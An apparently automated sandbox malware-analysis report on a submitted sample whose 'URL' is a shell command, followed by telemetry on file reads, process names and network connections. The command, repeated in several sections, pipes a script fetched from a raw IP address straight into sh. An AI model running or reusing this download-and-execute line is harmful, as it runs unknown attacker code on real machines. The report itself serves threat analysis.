Malware Analysis Report

2025-08-10 19:54

Sample ID 250703-gng1lsfm3s
Target http://bash -c "curl 158.51.126.131/zy.sh -o- | sh";echo -n "H4G0dNRhNFbAIEs3Zt1kvQAnGsk74yXUKHCfnRVLMHR3HYcpf2N1CWn8QBblXcmT5yH16
Tags
antivm discovery
score
6/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
6/10

Threat Level: Shows suspicious behavior

The file http://bash -c "curl 158.51.126.131/zy.sh -o- | sh";echo -n "H4G0dNRhNFbAIEs3Zt1kvQAnGsk74yXUKHCfnRVLMHR3HYcpf2N1CWn8QBblXcmT5yH16 was found to be: Shows suspicious behavior.

Malicious Activity Summary

antivm discovery

Reads hardware information

Checks hardware identifiers (DMI)

Reads CPU attributes

Changes its process name

Checks CPU configuration

Reads runtime system information

Enumerates kernel/hardware configuration

Writes file to tmp directory

cURL User-Agent

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-07-03 05:56

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-07-03 05:56

Reported

2025-07-03 05:59

Platform

ubuntu2404-amd64-20250610-en

Max time kernel

43s

Max time network

128s

Command Line

[firefox -new-tab http://bash -c "curl 158.51.126.131/zy.sh -o- | sh";echo -n "H4G0dNRhNFbAIEs3Zt1kvQAnGsk74yXUKHCfnRVLMHR3HYcpf2N1CWn8QBblXcmT5yH16]

Signatures

Checks hardware identifiers (DMI)

antivm
Description Indicator Process Target
File opened for reading /sys/devices/virtual/dmi/id/product_name /usr/lib/firefox/firefox-bin N/A

Reads hardware information

discovery
Description Indicator Process Target
File opened for reading /sys/devices/virtual/dmi/id/product_sku /usr/lib/firefox/firefox-bin N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself AsyncSi~lThread /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself pool-spawner /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself gmain /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself gdbus /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself glean.dispatche /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself IPC I/O Parent /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself IPC I/O Parent /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself IPC I/O Parent /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself Timer /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself Timer /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself Netlink Monitor /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself Netlink Monitor /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself Socket Thread /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself Socket Thread /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself IPDL Background /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself IPDL Background /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself Backgro~Pool #1 /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself Backgro~Pool #1 /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself pool-firefox /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself pool-firefox /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself pool-firefox /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself glxtest:disk$0 /usr/lib/firefox/glxtest N/A
Changes the process name, possibly in an attempt to hide itself HTML5 Parser /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself HTML5 Parser /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself JS Watchdog /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself JS Watchdog /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself BGReadURLs /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself BGReadURLs /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself Cache2 I/O /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself Cache2 I/O /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself Cookie /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself Cookie /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself StreamTrans #1 /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself StreamTrans #1 /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself TaskCon~ller #0 /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself TaskCon~ller #1 /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself BgIOThr~Pool #1 /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself BgIOThr~Pool #1 /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself BgIOThr~Pool #2 /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself BgIOThr~Pool #2 /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself Worker Launcher /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself Worker Launcher /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself QuotaManager IO /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself QuotaManager IO /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself Softwar~cThread /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself Softwar~cThread /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself Softwar~cThread /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself Renderer /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself WRWorker#0 /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself Renderer /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself WRWorker#0 /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself WRWorkerLP#0 /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself WRWorkerLP#0 /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself Glyph rasterize /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself WrGlyph~terizer /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself Compositor /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself Compositor /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself CanvasRenderer /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself CanvasRenderer /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself ImageIO /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself ImageIO /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself IPC Launch /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself IPC Launch /usr/lib/firefox/firefox-bin N/A
Changes the process name, possibly in an attempt to hide itself Permission /usr/lib/firefox/firefox-bin N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/lib/firefox/firefox-bin N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/present /usr/lib/firefox/firefox-bin N/A
File opened for reading /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq /usr/lib/firefox/firefox-bin N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/size /usr/lib/firefox/firefox-bin N/A
File opened for reading /sys/devices/system/cpu/possible /usr/lib/firefox/firefox-bin N/A
File opened for reading /sys/devices/system/cpu/present /usr/lib/firefox/firefox-bin N/A
File opened for reading /sys/devices/system/cpu/possible /usr/lib/firefox/firefox-bin N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/size /usr/lib/firefox/firefox-bin N/A
File opened for reading /sys/devices/system/cpu/cpu0/topology/core_cpus /usr/lib/firefox/firefox-bin N/A
File opened for reading /sys/devices/system/cpu/possible /usr/lib/firefox/glxtest N/A
File opened for reading /sys/devices/system/cpu/cpu0/cpu_capacity /usr/lib/firefox/glxtest N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/bus/pci/devices/0000:00:04.0/device /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:04.0/class /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:05.0/vendor /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:02.0/class /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:01.1/device /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:01.0/class /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:05.0/class /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:04.0/vendor /usr/lib/firefox/glxtest N/A
File opened for reading /sys/devices/pci0000:00/0000:00:02.0/subsystem_vendor /usr/lib/firefox/glxtest N/A
File opened for reading /sys/devices/pci0000:00/0000:00:02.0/subsystem_device /usr/lib/firefox/glxtest N/A
File opened for reading /sys/fs/cgroup/system.slice/agent.service/cpu.max /usr/lib/firefox/firefox-bin N/A
File opened for reading /sys/devices/system/node /usr/lib/firefox/firefox-bin N/A
File opened for reading /sys/bus/pci/devices/0000:00:03.0/device /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:03.0/class /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:00.0/device /usr/lib/firefox/glxtest N/A
File opened for reading /sys/devices/pci0000:00/0000:00:02.0/vendor /usr/lib/firefox/glxtest N/A
File opened for reading /sys/fs/cgroup/system.slice/agent.service/cpu.max /usr/lib/firefox/firefox-bin N/A
File opened for reading /sys/module/apparmor/parameters/enabled /usr/bin/dbus-daemon N/A
File opened for reading /sys/bus/pci/devices/0000:00:06.0/vendor /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:06.0/class /usr/lib/firefox/glxtest N/A
File opened for reading /sys/devices/pci0000:00/0000:00:02.0/drm/card1 /usr/lib/firefox/firefox-bin N/A
File opened for reading /sys/bus/pci/devices/0000:00:00.0/vendor /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:00.0/class /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:05.0/device /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:02.0/vendor /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:03.0/vendor /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:01.3/class /usr/lib/firefox/glxtest N/A
File opened for reading /sys/devices/pci0000:00/0000:00:02.0/uevent /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:02.0/device /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:06.0/device /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:01.1/class /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:01.3/device /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:01.0/vendor /usr/lib/firefox/glxtest N/A
File opened for reading /sys/devices/pci0000:00/0000:00:02.0/device /usr/lib/firefox/glxtest N/A
File opened for reading /sys/class/drm/card0/device/boot_vga /usr/lib/firefox/glxtest N/A
File opened for reading /sys/devices/pci0000:00/0000:00:02.0/drm/renderD128 /usr/lib/firefox/firefox-bin N/A
File opened for reading /sys/kernel/security/apparmor/features/dbus/mask /usr/bin/dbus-daemon N/A
File opened for reading /sys/bus/pci/devices/0000:00:01.3/vendor /usr/lib/firefox/glxtest N/A
File opened for reading /sys/devices/pci0000:00/0000:00:02.0 /usr/lib/firefox/firefox-bin N/A
File opened for reading /sys/bus/pci/devices/0000:00:01.1/vendor /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:01.0/device /usr/lib/firefox/glxtest N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/fd/40 /usr/lib/firefox/firefox-bin N/A
File opened for reading /proc/self/mountinfo /usr/lib/firefox/firefox-bin N/A
File opened for reading /proc/mounts /usr/bin/dbus-daemon N/A
File opened for reading /proc/2193/stat /usr/lib/firefox/firefox-bin N/A
File opened for reading /proc/2101/stat /usr/lib/firefox/firefox-bin N/A
File opened for reading /proc/self/fd/44 /usr/lib/firefox/firefox-bin N/A
File opened for reading /proc/self/fd/102 /usr/lib/firefox/firefox-bin N/A
File opened for reading /proc/self/stat /usr/lib/firefox/firefox-bin N/A
File opened for reading /proc/filesystems /usr/libexec/gvfsd-fuse N/A
File opened for reading /proc/self/fd/80 /usr/lib/firefox/firefox-bin N/A
File opened for reading /proc/2256/stat /usr/lib/firefox/firefox-bin N/A
File opened for reading /proc/self/maps /usr/lib/firefox/firefox-bin N/A
File opened for reading /proc/sys/kernel/cap_last_cap /usr/bin/dbus-daemon N/A
File opened for reading /proc/filesystems /usr/lib/firefox/firefox-bin N/A
File opened for reading /proc/2156/cmdline /usr/bin/dbus-daemon N/A
File opened for reading /proc/self/task/2196/stat /usr/lib/firefox/firefox-bin N/A
File opened for reading /proc/self/task/2239/stat /usr/lib/firefox/firefox-bin N/A
File opened for reading /proc/2109/cmdline /usr/bin/dbus-daemon N/A
File opened for reading /proc/self/cgroup /usr/lib/firefox/firefox-bin N/A
File opened for reading /proc/filesystems /usr/lib/firefox/firefox-bin N/A
File opened for reading /proc/filesystems /usr/libexec/xdg-document-portal N/A
File opened for reading /proc/self/status /usr/lib/firefox/firefox-bin N/A
File opened for reading /proc/self/mountinfo /usr/lib/firefox/firefox-bin N/A
File opened for reading /proc/self/task/2103/stat /usr/lib/firefox/firefox-bin N/A
File opened for reading /proc/self/task/2203/stat /usr/lib/firefox/firefox-bin N/A
File opened for reading /proc/self/fd/88 /usr/lib/firefox/firefox-bin N/A
File opened for reading /proc/self/fd/96 /usr/lib/firefox/firefox-bin N/A
File opened for reading /proc/2150/cmdline /usr/bin/dbus-daemon N/A
File opened for reading /proc/self/fd/56 /usr/lib/firefox/firefox-bin N/A
File opened for reading /proc/2245/stat /usr/lib/firefox/firefox-bin N/A
File opened for reading /proc/self/fd /usr/bin/dbus-daemon N/A
File opened for reading /proc/2058/attr/apparmor/current /usr/bin/dbus-daemon N/A
File opened for reading /proc/filesystems /usr/libexec/xdg-permission-store N/A
File opened for reading /proc/self/task/2172/comm /usr/libexec/xdg-desktop-portal N/A
File opened for reading /proc/self/fd/66 /usr/lib/firefox/firefox-bin N/A
File opened for reading /proc/self/task/2247/stat /usr/lib/firefox/firefox-bin N/A
File opened for reading /proc/self/fd /usr/bin/dbus-launch N/A
File opened for reading /proc/filesystems /usr/bin/dbus-daemon N/A
File opened for reading /proc/self/fd/16 /usr/lib/firefox/firefox-bin N/A
File opened for reading /proc/self/maps /usr/lib/firefox/firefox-bin N/A
File opened for reading /proc/self/fd/118 /usr/lib/firefox/firefox-bin N/A
File opened for reading /proc/self/task/2260/stat /usr/lib/firefox/firefox-bin N/A
File opened for reading /proc/self/cgroup /usr/lib/firefox/firefox-bin N/A
File opened for reading /proc/filesystems /usr/libexec/at-spi-bus-launcher N/A
File opened for reading /proc/2106/cmdline /usr/bin/dbus-daemon N/A
File opened for reading /proc/self/fd/54 /usr/lib/firefox/firefox-bin N/A
File opened for reading /proc/filesystems /usr/lib/firefox/glxtest N/A
File opened for reading /proc/filesystems /usr/libexec/xdg-desktop-portal N/A
File opened for reading /proc/2133/cmdline /usr/bin/dbus-daemon N/A
File opened for reading /proc/2145/cmdline /usr/bin/dbus-daemon N/A
File opened for reading /proc/2058/status /usr/bin/dbus-daemon N/A
File opened for reading /proc/filesystems /usr/libexec/xdg-desktop-portal-gtk N/A
File opened for reading /proc/filesystems /usr/libexec/gvfsd N/A
File opened for reading /proc/self/task/2038/stat /usr/lib/firefox/firefox-bin N/A
File opened for reading /proc/self/stat /usr/lib/firefox/firefox-bin N/A
File opened for reading /proc/2036/cmdline /usr/bin/dbus-daemon N/A
File opened for reading /proc/self/fd/38 /usr/lib/firefox/firefox-bin N/A
File opened for reading /proc/self/fd/46 /usr/lib/firefox/firefox-bin N/A
File opened for reading /proc/2126/cmdline /usr/bin/dbus-daemon N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/firefox/.parentlock /usr/lib/firefox/firefox-bin N/A

cURL User-Agent

Description Indicator Process Target
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A

Processes

/usr/bin/firefox

[firefox -new-tab http://bash -c "curl 158.51.126.131/zy.sh -o- | sh";echo -n "H4G0dNRhNFbAIEs3Zt1kvQAnGsk74yXUKHCfnRVLMHR3HYcpf2N1CWn8QBblXcmT5yH16]

/usr/lib/firefox/firefox-bin

[firefox -new-tab http://bash -c "curl 158.51.126.131/zy.sh -o- | sh";echo -n "H4G0dNRhNFbAIEs3Zt1kvQAnGsk74yXUKHCfnRVLMHR3HYcpf2N1CWn8QBblXcmT5yH16]

/usr/lib/firefox/crashhelper

[/usr/lib/firefox/crashhelper 2036 9 /tmp/ 10 12]

/usr/local/sbin/dbus-launch

[dbus-launch --autolaunch=36e6eb39a6fa405996e79cad2731865d --binary-syntax --close-stderr]

/usr/local/bin/dbus-launch

[dbus-launch --autolaunch=36e6eb39a6fa405996e79cad2731865d --binary-syntax --close-stderr]

/usr/sbin/dbus-launch

[dbus-launch --autolaunch=36e6eb39a6fa405996e79cad2731865d --binary-syntax --close-stderr]

/usr/bin/dbus-launch

[dbus-launch --autolaunch=36e6eb39a6fa405996e79cad2731865d --binary-syntax --close-stderr]

/usr/bin/dbus-daemon

[/usr/bin/dbus-daemon --syslog-only --fork --print-pid 5 --print-address 7 --session]

/usr/local/sbin/dbus-launch

[dbus-launch --autolaunch=36e6eb39a6fa405996e79cad2731865d --binary-syntax --close-stderr]

/usr/local/bin/dbus-launch

[dbus-launch --autolaunch=36e6eb39a6fa405996e79cad2731865d --binary-syntax --close-stderr]

/usr/sbin/dbus-launch

[dbus-launch --autolaunch=36e6eb39a6fa405996e79cad2731865d --binary-syntax --close-stderr]

/usr/bin/dbus-launch

[dbus-launch --autolaunch=36e6eb39a6fa405996e79cad2731865d --binary-syntax --close-stderr]

/usr/lib/firefox/glxtest

[/usr/lib/firefox/glxtest -f 17]

/usr/local/sbin/dbus-launch

[dbus-launch --autolaunch=36e6eb39a6fa405996e79cad2731865d --binary-syntax --close-stderr]

/usr/local/bin/dbus-launch

[dbus-launch --autolaunch=36e6eb39a6fa405996e79cad2731865d --binary-syntax --close-stderr]

/usr/sbin/dbus-launch

[dbus-launch --autolaunch=36e6eb39a6fa405996e79cad2731865d --binary-syntax --close-stderr]

/usr/bin/dbus-launch

[dbus-launch --autolaunch=36e6eb39a6fa405996e79cad2731865d --binary-syntax --close-stderr]

/usr/lib/firefox/firefox-bin

[/usr/lib/firefox/firefox-bin -contentproc -ipcHandle 0 -initialChannelId {0cd4c6bc-69f1-486e-bc88-aabae6e45197} -parentPid 2036 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser 1 forkserver]

/usr/libexec/xdg-desktop-portal

[/usr/libexec/xdg-desktop-portal]

/usr/libexec/at-spi-bus-launcher

[/usr/libexec/at-spi-bus-launcher]

/usr/libexec/xdg-document-portal

[/usr/libexec/xdg-document-portal]

/usr/libexec/xdg-permission-store

[/usr/libexec/xdg-permission-store]

/usr/bin/fusermount3

[fusermount3 -o rw,nosuid,nodev,fsname=portal,auto_unmount,subtype=portal -- /root/.cache/doc]

/usr/libexec/xdg-desktop-portal-gtk

[/usr/libexec/xdg-desktop-portal-gtk]

/usr/libexec/gvfsd

[/usr/libexec/gvfsd]

/usr/libexec/gvfsd-fuse

[/usr/libexec/gvfsd-fuse /root/.gvfs -f]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 ads.mozilla.org udp
US 8.8.8.8:53 ads.mozilla.org udp
US 8.8.8.8:53 merino.services.mozilla.com udp
US 8.8.8.8:53 merino.services.mozilla.com udp
US 34.110.138.217:443 merino.services.mozilla.com udp
AU 1.1.1.1:53 ads.mozilla.org udp
AU 1.1.1.1:53 ads.mozilla.org udp
AU 1.1.1.1:53 mc.prod.ads.prod.webservices.mozgcp.net udp
US 158.51.126.131:80 158.51.126.131 tcp
US 158.51.126.131:80 158.51.126.131 tcp
US 158.51.126.131:80 158.51.126.131 tcp
US 158.51.126.131:80 158.51.126.131 tcp
US 158.51.126.131:80 158.51.126.131 tcp
US 158.51.126.131:80 158.51.126.131 tcp
US 158.51.126.131:80 158.51.126.131 tcp
US 158.51.126.131:80 158.51.126.131 tcp
US 158.51.126.131:80 158.51.126.131 tcp
US 158.51.126.131:80 158.51.126.131 tcp
US 158.51.126.131:80 158.51.126.131 tcp

Files

N/A